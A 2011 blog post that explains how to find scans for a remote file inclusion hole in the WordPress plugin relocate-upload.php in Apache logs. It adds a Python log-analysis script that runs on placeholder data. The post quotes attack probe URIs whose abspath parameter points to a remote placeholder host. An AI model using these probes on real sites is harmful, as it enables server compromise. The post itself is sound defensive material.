WordPress-Php hacking via plugin: relocate-upload.php

By Dale Reagan | September 19, 2011

Do you check your Apache/Web-Server logs for errors?  Today I noted:

This appears to be a scan for a WordPress (non-core) plugin written around 2009, which some users may still be running (WordPress.org download stats show only a few thousand downloads).

CAVEAT: since IP addresses can be spoofed/masked/hidden and proxies might be in use, it is quite possible that the IP addresses and domains shown are not having ‘security issues’ – I will err on the side of caution and make appropriate server-level changes…  [I have inserted/added more-or-less random space characters into the IPs and domains listed below.]

If you find similar activity in your logs what can you do about it?

Search your logs for ‘relocate-upload.php’ – any hits?  Same destination/source IPs across the hits?

http://www.your_domain.com/some_path/relocate-upload_URI_variants_Below, i.e.

relocate-upload.php?ru_folder=asdf&abspath=http://CompromisedHost/SOME_PATH/byroe.jpg??

Another URI variation – Note this is one very long URI…:

  1. %3A%2F%2FYOUR_DOMAIN.com%2F2010%2F02%2FA_Valid_URL_on_YOUR_Site%2F',
  2. '4','10','%2Frelocate-upload%2F',''
  3. ,%20'00a54037c6512959ef4bddf710962437d05a45a01c513e7e8564',%200)
  4. //plugins/relocate - upload/relocate - upload.php?ru_folder=asdf& abspath=test??
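As an added example (not from the original post), the log check above in Python, run over constructed Apache combined-format lines: it picks out requests for relocate-upload.php, decodes the abspath parameter (including the %3A%2F%2F-encoded variant shown above), flags values that are remote URLs rather than a local directory, and tallies hits per client IP and per remote host in the same count | host style as the lists in this post. The sample lines, addresses and host names are constructed placeholders.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines (RFC 5737 addresses, *.example hosts); not the post's real logs.
SAMPLE_LOG = """\
192.0.2.10 - - [18/Sep/2011:03:14:07 +0000] "GET /wp-content/plugins/relocate-upload/relocate-upload.php?ru_folder=asdf&abspath=http://bad.example/x/byroe.jpg?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
192.0.2.10 - - [18/Sep/2011:03:14:09 +0000] "GET /wp-content/plugins/relocate-upload/relocate-upload.php?ru_folder=asdf&abspath=http%3A%2F%2Fother.example%2Fimg%2Flogo.png%2Fallnet.jpg HTTP/1.1" 404 213 "-" "Mozilla/5.0"
198.51.100.7 - - [18/Sep/2011:04:01:22 +0000] "GET /wp-content/plugins/relocate-upload/relocate-upload.php?ru_folder=asdf&abspath=test?? HTTP/1.1" 404 213 "-" "-"
203.0.113.5 - - [18/Sep/2011:04:02:00 +0000] "GET /2010/02/a-valid-post/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# Client IP, request URI and status code from a common/combined log line.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<uri>\S+)[^"]*" (?P<status>\d{3})')

def analyze(log_text):
    """Return (hits, per_ip, per_remote); hits = [(client_ip, abspath, remote_host, status)]."""
    hits, per_ip, per_remote = [], Counter(), Counter()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path, _, query = m.group("uri").partition("?")
        if not path.lower().endswith("relocate-upload.php"):
            continue
        # parse_qs percent-decodes, so the %3A%2F%2F-encoded variant becomes a URL too.
        params = parse_qs(query, keep_blank_values=True)
        abspath = params.get("abspath", [""])[0]
        # abspath is meant to name a local directory; a URL here is a remote-include probe.
        remote = ""
        if abspath.lower().startswith(("http://", "https://")):
            remote = urlsplit(abspath).netloc
        hits.append((m.group("ip"), abspath, remote, m.group("status")))
        per_ip[m.group("ip")] += 1
        if remote:
            per_remote[remote] += 1
    return hits, per_ip, per_remote

def report(log_text):
    """Print a count | host summary like the post's lists; return probes answered with 200."""
    hits, per_ip, per_remote = analyze(log_text)
    served = sum(1 for h in hits if h[3] == "200")  # 200 means the plugin is really installed
    print(f"{len(hits)} probes, {served} answered with 200")
    for host, n in per_remote.most_common():
        print(f"{n:4d} | remote host {host}")
    for ip, n in per_ip.most_common():
        print(f"{n:4d} | client {ip}")
    return served
```

A non-zero return from report() means the probed plugin path actually exists on the server and should be patched or removed; the 404s only tell you who is scanning.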


The Domains/systems below are either compromised OR actively supporting malicious-type activity on 9/18/2011.

The requested target (the malicious URL passed in abspath) came in 9 variants, with from 6 to 184 access attempts per URL.


GeoIP info for above, possibly malicious/compromised systems:


GeoIP info for, and the number of web requests originating from, the IPs listed below.

